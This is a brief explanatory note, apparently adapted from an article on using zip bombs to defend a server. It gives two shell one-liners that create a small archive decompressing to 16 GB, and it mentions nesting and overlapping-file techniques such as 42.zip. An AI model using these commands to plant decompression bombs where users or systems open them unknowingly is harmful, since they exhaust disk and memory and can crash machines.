Note

Adapted from I use Zip Bombs to Protect my Server.

The simplest zip bomb is probably something like the following, which should create a relatively small file that decompresses to 16 GB:

# Using zip
dd if=/dev/zero bs=1G count=16 | zip zipbomb.zip -
 
# Using gzip
dd if=/dev/zero bs=1G count=16 | gzip -c > gzipbomb.gz

More sophisticated zip bombs, such as the famous 42.zip, can use nesting to achieve much more significant results (42.zip is ~42 KB in size, but will decompress to multiple files totally ~4.5 PB). Custom code can achieve even greater decompression ratios without nesting by overlapping files within the compressed archive.